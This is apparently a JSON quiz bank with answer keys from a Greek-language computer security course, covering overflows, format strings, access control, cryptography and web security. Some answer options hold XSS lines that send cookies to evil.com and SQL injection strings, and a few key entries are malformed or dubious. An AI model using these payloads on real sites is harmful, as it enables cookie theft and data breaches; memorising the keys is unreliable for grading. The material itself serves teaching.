[
  {
    "id": 1,
    "title": "Security Fundamentals",
    "questions": [
      {
        "question": "Είναι καλή ιδέα να χρησιμοποιώ scanf(\"%s\", buffer) στον κώδικά μου;",
        "answers": ["True", "False"],
        "correctAnswer": "False",
        "photo": "q1q1"
      },
      {
        "question": "Λόγω ενός πρόσφατου data-breach όλοι οι αριθμοί κοινωνικής ασφάλισης των χρηστών μας έγιναν leak. Αυτό είναι πρόβλημα:",
        "answers": ["Confidentiality", "Integrity", "Availability", "Authenticity"],
        "correctAnswer": "Confidentiality",
        "photo": "q1q2"
      },
      {
        "question": "We always include the adversary's strategy in our adversary definition.",
        "answers": ["True", "False"],
        "correctAnswer": "False",
        "photo": "q1q3"
      },
      {
        "question": "Ποιο από τα παρακάτω ΔΕΝ αποτελεί μέρος του Trusted Computing Base (TCB) του Mars Rover;",
        "answers": [
          "Το Hardware του Mars Rover",
          "Το Real Time Operating System (RTOS) του",
          "Το λογισμικό επικοινωνίας που τρέχει στον επίγειο σταθμό",
          "Το λογισμικό επικοινωνίας που τρέχει στο Mars Rover"
        ],
        "correctAnswer": "Το λογισμικό επικοινωνίας που τρέχει στον επίγειο σταθμό",
        "photo": "q1q4"
      },
      {
        "question": "Στους μεγάλους οργανισμούς η πλειοψηφία των χρηστών δεν έχουν root access στον υπολογιστή τους. Αυτό είναι παράδειγμα:",
        "answers": [
          "Authenticity",
          "Economy of Mechanism (KISS)",
          "Complete mediation",
          "Least privilege"
        ],
        "correctAnswer": "Least privilege",
        "photo": "q1q5"
      },
      {
        "question": "Το να \"κρύβουμε\" το κλειδί κάτω από το χαλάκι είναι",
        "answers": [
          "Λάθος - Security through obscurity",
          "Σωστό - Least privilege",
          "Λάθος - Separation of Duty",
          "Λάθος - εμείς το κρύβουμε στο γλαστράκι"
        ],
        "correctAnswer": "Λάθος - Security through obscurity",
        "photo": "q1q6"
      },
      {
        "question": "Κάναμε ένα exploit στο οποίο αλλάξαμε το expected password γράφοντας εκτός ενός buffer. Αυτό είναι πρόβλημα:",
        "answers": [
          "Confidentiality",
          "Integrity",
          "Authenticity",
          "Των άλλων, εμένα παίζει το exploit :)"
        ],
        "correctAnswer": "Integrity",
        "photo": "q1q7"
      },
      {
        "question": "Οι IT προμήθειες ενός οργανισμού σχεδιάζονται και εγκρίνονται αποκλειστικά από τον VP of IT. Αυτό είναι:",
        "answers": [
          "Καλό γιατί έχει Complete Mediation για το τι αγοράζεται",
          "Κακό γιατί δεν υπάρχει Separation of Duty",
          "Καλό γιατί αυτό είναι ένα Fail-safe Default",
          "Κακό γιατί δεν ακολουθεί το Least Privilege"
        ],
        "correctAnswer": "Κακό γιατί δεν υπάρχει Separation of Duty",
        "photo": "q1q8"
      },
      {
        "question": "Ένα σύστημα βιομετρικής αναγνώρισης προσώπου πρέπει να λύνει το πρόβλημα του",
        "answers": ["Confidentiality", "Authenticity", "Integrity", "Availability"],
        "correctAnswer": "Authenticity",
        "photo": "q1q9"
      },
      {
        "question": "Ένας γραφολόγος ελέγχει την υπογραφή μας σε ένα συμβόλαιο για να εγγυηθεί το",
        "answers": ["Confidentiality", "Integrity", "Authenticity", "Availability"],
        "correctAnswer": ["Integrity", "Authenticity"],
        "photo": "q1q10"
      },
      {
        "question": "Στο αεροδρόμιο ελέγχουν τα εισιτήρια/διαβατήριο μας σε πολλαπλά, συνεχόμενα checkpoints. Αυτό είναι παράδειγμα:",
        "answers": [
          "Least privilege",
          "No security through obscurity",
          "Defense in depth",
          "Separation of Duty"
        ],
        "correctAnswer": "Defense in depth",
        "photo": "q1q11"
      }
    ]
  },
  {
    "id": 2,
    "title": "x86 and Buffer Overflows",
    "questions": [
      {
        "question": "Στο βιβλίο του Douglas Adams - Hitchhiker's Guide to the Galaxy η απάντηση στα πάντα είναι 42 επειδή",
        "answers": [
          "Του άρεσε το 42",
          "Είναι ο ASCII κωδικός του 'Β'",
          "Είναι ο ASCII κωδικός του '*'",
          "Παρακαλώ;"
        ],
        "correctAnswer": "Είναι ο ASCII κωδικός του '*'",
        "photo": "q2q1"
      },
      {
        "question": "Ποιο από τα παρακάτω δεν είναι όνομα καταχωρητή σε x86;",
        "answers": ["Frame Pointer", "Stack Pointer", "Instruction Pointer", "Laser Pointer"],
        "correctAnswer": "Laser Pointer",
        "photo": "q2q2"
      },
      {
        "question": "Η στοίβα μεγαλώνει προς",
        "answers": ["μεγαλύτερες διευθύνσεις (πάνω)", "μικρότερες διευθύνσεις (κάτω)"],
        "correctAnswer": "μικρότερες διευθύνσεις (κάτω)",
        "photo": "q2q3"
      },
      {
        "question": "Όταν καλούμε μια συνάρτηση foo(arg1, arg2, arg3) σε x86 τα ορίσματα μπαίνουν στην στοίβα με σειρά:",
        "answers": ["Από δεξιά προς τα αριστερά", "Από αριστερά προς τα δεξιά"],
        "correctAnswer": "Από δεξιά προς τα αριστερά",
        "photo": "q2q4"
      },
      {
        "question": "Η εντολή push %eax σε 32-bit x86 assembly μειώνει τον stack pointer esp κατά",
        "answers": ["-2", "2", "4", "8"],
        "correctAnswer": "4",
        "photo": "q2q5"
      },
      {
        "question": "Αν αντιστρέψω την κατεύθυνση με την οποία γράφω τα στοιχεία ενός πίνακα στην μνήμη δεν θα είχα buffer overflows",
        "answers": ["True", "False"],
        "correctAnswer": "False",
        "photo": "q2q6"
      },
      {
        "question": "Η συνάρτησή μας τελείωσε - πόσο αυξήθηκε ο SP κατά τον ακόλουθο επίλογο (32-bit);",
        "answers": ["1", "4", "8", "12"],
        "correctAnswer": "8",
        "photo": "q2q7"
      },
      {
        "question": "Η εντολή με την οποία τοποθετώ ένα breakpoint σε x86 έχει κωδικό:",
        "answers": ["0x90", "0x42", "0xCC", "0xGG"],
        "correctAnswer": "0xCC",
        "photo": "q2q8"
      },
      {
        "question": "[Περσινό θέμα] Μόλις τρέξαμε αυτές τις εντολές στην αρχή της συνάρτησης, ο Stack Pointer (SP) μειώθηκε κατά:",
        "answers": ["42", "66", "70", "Trick question - αυξήθηκε!"],
        "correctAnswer": "70",
        "photo": "q2q9"
      },
      {
        "question": "Ο ebp έχει την τιμή 32, ποια η τιμή του eax μετά την εντολή lea -0x10(%ebp),%eax;",
        "answers": ["22", "42", "16", "Δεν μπορούμε να ξέρουμε"],
        "correctAnswer": "16",
        "photo": "q2q10"
      }
    ]
  },
  {
    "id": 3,
    "title": "Format Strings and Mitigations",
    "questions": [
      {
        "question": "Πόσους χαρακτήρες θα τυπώσει το printf(\"%5$42c\") ;",
        "answers": ["5", "42", "43", "Δεν κάνει compile"],
        "correctAnswer": "42",
        "photo": "q3q1"
      },
      {
        "question": "Ποιο από τα παρακάτω δεν είναι control flow hijack mitigation;",
        "answers": ["NX", "ASLR", "Canaries", "Session Cookies"],
        "correctAnswer": "Session Cookies",
        "photo": "q3q2"
      },
      {
        "question": "Ποια άμυνα δημιουργήθηκε για να εμποδίσει το shellcode injection;",
        "answers": ["Stack Canaries", "Stack Guard", "DEP", "ASLR"],
        "correctAnswer": "DEP",
        "photo": "q3q3"
      },
      {
        "question": "Ποια τεχνική μπορεί να χρησιμοποιηθεί ενάντια στο DEP;",
        "answers": [
          "Όλα τα παρακάτω",
          "ret2libc",
          "Function pointer overwrite",
          "ret2pop",
          "ret2got",
          "ret2text"
        ],
        "correctAnswer": "Όλα τα παρακάτω",
        "photo": "q3q4"
      },
      {
        "question": "Ποιο είναι το canary που παρέχει την λιγότερη ασφάλεια;",
        "answers": ["Random canary", "Terminator", "Hardcoded at compile time", "No canary"],
        "correctAnswer": "No canary",
        "photo": "q3q5"
      },
      {
        "question": "Ποια τεχνική μπορεί να ξεπεράσει την ασφάλεια των stack canaries;",
        "answers": [
          "Format string attack",
          "Function Pointer Overwrite",
          "Pointer Subterfuge",
          "Όλα τα παραπάνω"
        ],
        "correctAnswer": "Όλα τα παραπάνω",
        "photo": "q3q6"
      },
      {
        "question": "Τι μπορεί να μειώσει την αποτελεσματικότητα του ASLR;",
        "answers": [
          "32-bit address space",
          "Παρουσία non-PIE κώδικα",
          "Memory leaks",
          "Όλα τα παραπάνω"
        ],
        "correctAnswer": "Όλα τα παραπάνω",
        "photo": "q3q7"
      },
      {
        "question": "Thankfully, buffer overflows, ROP chains and similar attacks are no longer a problem thanks to modern defenses.",
        "answers": ["True", "False"],
        "correctAnswer": "False",
        "photo": "q3q8"
      },
      {
        "question": "Τι θα τυπώσει το printf(\"%2$s %2$s\", \"have\", \"a\", \"great\", \"day\");",
        "answers": ["Θα κρασάρει", "a day", "a a", "have a"],
        "correctAnswer": "a a",
        "photo": "q3q9"
      },
      {
        "question": "Τι θα τυπώσει το int n1, n2; printf(\"hi%nworld%n\", &n1, &n2); printf(\" %d %d\", n1, n2);",
        "answers": ["hi world 0 0", "hi world 7 7", "hiworld2 7", "Will not compile"],
        "correctAnswer": "hiworld2 7",
        "photo": "q3q10"
      },
      {
        "question": "Τι θα τυπώσει η printf(\"%3$x\"); αν η στοίβα έχει ως εξής",
        "answers": ["41414141", "41", "42424242", "43434343"],
        "correctAnswer": "43434343",
        "photo": "q3q11"
      },
      {
        "question": "Τι θα τυπώσει η printf(\"%3$c\"); αν η στοίβα έχει ως εξής",
        "answers": ["41", "42", "43", "C"],
        "correctAnswer": "C",
        "photo": "q3q11"
      }
    ]
  },
  {
    "id": 4,
    "title": "Access Control & CFI",
    "questions": [
      {
        "question": "Το πρόβλημα του Access Control έχει λυθεί και εφαρμόζεται με τον ίδιο δομημένο τρόπο σε όλη την βιομηχανία",
        "answers": ["True", "False"],
        "correctAnswer": "False",
        "photo": "q4q1"
      },
      {
        "question": "Μπορώ να έχω RBAC και DAC;",
        "answers": ["True", "False"],
        "correctAnswer": "True",
        "photo": "q4q2"
      },
      {
        "question": "Ένας reference monitor χρειάζεται Complete Mediation για να εφαρμόσει πολιτικές (policies)",
        "answers": ["True", "False"],
        "correctAnswer": "True",
        "photo": "q4q3"
      },
      {
        "question": "Ποιο από τα παρακάτω δεν είναι όνομα User ID που έχει κάθε διεργασία (process) σε Linux;",
        "answers": ["Real User ID", "Saved User ID", "Session User ID", "Effective User ID"],
        "correctAnswer": "Session User ID",
        "photo": "q4q4"
      },
      {
        "question": "Γιατί δεν χρησιμοποιούμε τον Lampson's Matrix σε όλα τα συστήματα σήμερα;",
        "answers": [
          "Δεν υποστηρίζει authorization checks",
          "Είναι απαγορευτικά μεγάλος / μη αποδοτικός",
          "Δεν υποστηρίζει authentication checks",
          "Τυπογραφικό, είναι Sampson's Matrix"
        ],
        "correctAnswer": "Είναι απαγορευτικά μεγάλος / μη αποδοτικός",
        "photo": "q4q5"
      },
      {
        "question": "Σε ποια περίπτωση θα προτιμούσατε MAC (Mandatory) έναντι DAC (Discretionary);",
        "answers": [
          "Σε μια πλατφόρμα μοιράσματος διαδικτυακών βιντεοπαιχνιδιών",
          "Σε blogging προϊόν που οι χρήστες επιλέγουν με ποιους μοιράζονται τα posts",
          "Σε SaaS προϊόν όπου επιτρέπει σε χρήστες να φτιάχνουν groups και ρόλους",
          "Σε μια στρατιωτική εγκατάσταση για την πρόσβαση σε κρατικά μυστικά"
        ],
        "correctAnswer": "Σε μια στρατιωτική εγκατάσταση για την πρόσβαση σε κρατικά μυστικά",
        "photo": "q4q6"
      },
      {
        "question": "Έγραψα ανάλυση που ελέγχει: \"αν ο κώδικάς σου έχει strcpy τότε είναι ανασφαλής\". Για buffer overflows η ανάλυση είναι:",
        "answers": ["Unsound and Incomplete", "Complete", "Sound", "Sound and Complete"],
        "correctAnswer": "Unsound and Incomplete",
        "photo": "q4q7"
      },
      {
        "question": "Έγραψα ανάλυση που ελέγχει: \"αν ο κώδικάς σου κρασάρει με segmentation fault τότε είναι ανασφαλής\". Η ανάλυση είναι:",
        "answers": [
          "Sound",
          "Complete",
          "Good",
          "Δεν μπορώ να αποφανθώ γιατί δεν ξέρω ποια είναι η ιδιότητα που ελέγχω"
        ],
        "correctAnswer": "Δεν μπορώ να αποφανθώ γιατί δεν ξέρω ποια είναι η ιδιότητα που ελέγχω",
        "photo": "q4q8"
      },
      {
        "question": "Ποια από τα παρακάτω δεν αποτελεί πρόκληση για το CFI;",
        "answers": ["Callbacks", "Virtual Tables", "Direct Branches", "Dynamic Linking"],
        "correctAnswer": "Direct Branches",
        "photo": "q4q9"
      }
    ]
  },
  {
    "id": 5,
    "title": "Intro to Crypto",
    "questions": [
      {
        "question": "Έστω x = 42. Η τιμή της παράστασης x \\(\\oplus \\) 42 είναι:",
        "answers": ["42", "0", "1", "\\(\\oplus \\)"],
        "correctAnswer": "0",
        "photo": "q5q1"
      },
      {
        "question": "Ρωτήσαμε τον Αυγερινό αν θα βγάλει άλλες εργασίες και η απάντηση ήταν \"XKLINAZ\" (substitution cipher). Η απάντηση είναι:",
        "answers": ["Μάλλον", "Ίσως", "Όχι", "Σίγουρα"],
        "correctAnswer": "Σίγουρα",
        "photo": "q1q3"
      },
      {
        "question": "The One Time Pad offers perfect secrecy",
        "answers": ["True", "False"],
        "correctAnswer": "True",
        "photo": "q5q3"
      },
      {
        "question": "Χρησιμοποιώ one time pad και επιτρέπω το κλειδί \"0\" να επιλέγει τυχαία. Αυτό είναι :",
        "answers": ["Καλό", "Κακό", "Κάκιστο", "Δεν έχει σημασία"],
        "correctAnswer": "Καλό",
        "photo": "q5q4"
      },
      {
        "question": "Στο Linux έχω Access Control Lists by default;",
        "answers": ["True", "False"],
        "correctAnswer": "True",
        "photo": "q5q5"
      },
      {
        "question": "Τα capabilities στον πίνακα του Lampson αναπαρίστανται με",
        "answers": ["Γραμμές", "Στήλες", "Διαγωνίους", "Οφιοειδείς γραμμές"],
        "correctAnswer": "Γραμμές",
        "photo": "q5q6"
      },
      {
        "question": "Who is the strongest adversary in the secrecy game?",
        "answers": [
          "Chosen Plaintext Attack (CPA)",
          "Known Plaintext Attack (KPA)",
          "Chosen Ciphertext Attack (CCA)",
          "Ciphertext Only"
        ],
        "correctAnswer": "Chosen Ciphertext Attack (CCA)",
        "photo": "q5q7"
      },
      {
        "question": "The One Time Pad offers secure communication",
        "answers": ["True", "False"],
        "correctAnswer": "False",
        "photo": "q5q8"
      },
      {
        "question": "Έχω ένα plaintext m και ένα ciphertext c και χρήση OTP. Τα κλειδιά έχουν 128 bits πόσα κλειδιά k κάνουν map το m στο c;",
        "answers": ["0", "1", "2", "\\( 2^{128} \\)"],
        "correctAnswer": "1",
        "photo": "q5q9"
      },
      {
        "question": "Ο κανόνας που λέει ότι ο αλγόριθμος του κρυπτοσυστήματος πρέπει να είναι \"ανοιχτός\" αποδίδεται στον",
        "answers": ["Kirchhoff", "Captain Kirk", "Kerckhoffs", "Gandalf"],
        "correctAnswer": "Kerckhoffs",
        "photo": "q5q10"
      }
    ]
  },
  {
    "id": 6,
    "title": "Pseudorandom Functions and Permutations",
    "questions": [
      {
        "question": "Randomness and Pseudorandomness are different terms for the exact same concept",
        "answers": ["True", "False"],
        "correctAnswer": "False",
        "photo": "q1q3"
      },
      {
        "question": "Κατά τον Αυγερινό η μέθοδος του ανεμιστήρα κατά την βαθμολόγηση γραπτών είναι",
        "answers": [
          "Random",
          "Pseudorandom",
          "Μια εξαιρετική τακτική",
          "Λάθος, προτιμάει την μέθοδο της γάτας"
        ],
        "correctAnswer": "Pseudorandom",
        "photo": "q6q2"
      },
      {
        "question": "Πόσες αντιμεταθέσεις (permutations) της μορφής \\( F: X \\rightarrow X \\) υπάρχουν;",
        "answers": [
          "\\( \\mid X\\mid! \\)",
          "\\( 2  \\times \\mid X\\mid \\)",
          "\\( \\mid X\\mid^2 \\)",
          "\\( \\mid X\\mid^{\\mid X\\mid} \\)"
        ],
        "correctAnswer": "\\( \\abs{X}! \\)",
        "photo": "q6q3"
      },
      {
        "question": "Encoding offers the same secrecy guarantees as encryption",
        "answers": ["True", "False"],
        "correctAnswer": "False",
        "photo": "q6q4"
      },
      {
        "question": "One-way functions exist",
        "answers": ["True", "False"],
        "correctAnswer": "False",
        "photo": "q6q5"
      },
      {
        "question": "Αποφάσισα να βελτιώσω την ασφάλεια της εφαρμογής μου υλοποιώντας το δικό μου block cipher. Καλή ιδέα;",
        "answers": ["True", "False"],
        "correctAnswer": "False",
        "photo": "q6q6"
      },
      {
        "question": "Θέλω να χρησιμοποιήσω ένα block cipher για το σύστημά μου, προτείνω:",
        "answers": ["DES", "2DES", "3DES", "AES"],
        "correctAnswer": "AES",
        "photo": "q6q7"
      },
      {
        "question": "Ποιο από τα παρακάτω δεν είναι μήκος κλειδιού για το AES?",
        "answers": ["64", "128", "192", "256"],
        "correctAnswer": "64",
        "photo": "q6q8"
      },
      {
        "question": "Let \\( F: K \\times X \\rightarrow X \\) be a secure PRF. Is \\( G(K, X) = F(K, F(K, X)) \\) a secure PRF?",
        "answers": ["True", "False"],
        "correctAnswer": "True",
        "photo": "q6q9"
      }
    ]
  },
  {
    "id": 7,
    "title": "Web Security",
    "questions": [
      {
        "question": "Τσέκαρες τα email σου στο τοπικό beach cafe. Ευτυχώς πριν φύγεις έκανες logout. Τα δεδομένα σου είναι ασφαλή;",
        "answers": ["Σίγουρα", "Σίγουρα όχι", "Εξαρτάται", "Δεν πάω παραλία"],
        "correctAnswer": "Εξαρτάται",
        "photo": "q7q1"
      },
      {
        "question": "I need to see query output to figure out the contents of a DB",
        "answers": ["True", "False"],
        "correctAnswer": "False",
        "photo": "q7q2"
      },
      {
        "question": "Cookie content can always be trusted by the server",
        "answers": ["True", "False"],
        "correctAnswer": "False",
        "photo": "q7q3"
      },
      {
        "question": "XSS takes advantage of",
        "answers": [
          "The gullibility of the exploited user",
          "The Same Origin Policy",
          "The browser + frontend's trust in the web server",
          "The web server's trust in the browser + frontend"
        ],
        "correctAnswer": "The browser + frontend's trust in the web server",
        "photo": "q7q4"
      },
      {
        "question": "I just XSS'ed a user on site.com. I'll use this attack to send their bank.com cookies to me. How will I do this?",
        "answers": [
          "<script>alert(document.cookie)</script>",
          "<script>window.location=https://evil.com?foo=document.cookie</script>",
          "<script>fetch(https://evil.com?foo=document[\"bank.com\"].cookie)</script>",
          "Won't work because of Same Origin Policy"
        ],
        "correctAnswer": "Won't work because of Same Origin Policy",
        "photo": "q7q5"
      },
      {
        "question": "Someone just SQL injected our DB and leaked everyone's passwords. What do I do?",
        "answers": [
          "Nothing, all passwords are salted and hashed with PBKDF2 so we are good",
          "I coordinate with incident response team following company policy",
          "I email all users to let them know and force a password reset",
          "I try to find the exploited bug and remediate as quickly as possible"
        ],
        "correctAnswer": "I coordinate with incident response team following company policy",
        "photo": "q7q6"
      },
      {
        "question": "Using a modern and mature JS framework like React ensures XSS vulnerabilities are eliminated",
        "answers": ["True", "False"],
        "correctAnswer": "False",
        "photo": "q7q7"
      },
      {
        "question": "CSRF takes advantage of",
        "answers": [
          "The gullibility of the exploited user",
          "The Same Origin Policy",
          "The browser + frontend's trust in the web server",
          "The web server's trust in the browser + frontend"
        ],
        "correctAnswer": "The web server's trust in the browser + frontend",
        "photo": "q7q8"
      },
      {
        "question": "PM is asking me to implement authentication on the client side, I",
        "answers": [
          "hide the password in some obfuscated javascript to thwart the adversaries",
          "use secure SHA256 to first hash the password and only include that",
          "use typescript which is safe for that",
          "call them a fool"
        ],
        "correctAnswer": "call them a fool",
        "photo": "q7q9"
      },
      {
        "question": "Every horror movie could start with this line",
        "answers": [
          "I have a great idea for a SQL sanitization routine",
          "I have a great idea for a shell command sanitization routine",
          "I have a great idea for a new secure cookie generation routine",
          "Por qué no los tres?"
        ],
        "correctAnswer": "Por qué no los tres?",
        "photo": "q7q10"
      },
      {
        "question": "Found a way to stop SQL injections! Just strip the comment character! Can I be defeated?",
        "answers": [
          "' or 1 = 1 --",
          "' or '1' = '1'",
          "' or '1' = '1",
          "No, this sanitization mechanism is unbreakable"
        ],
        "correctAnswer": "' or '1' = '1'",
        "photo": "q7q11"
      }
    ]
  }
]
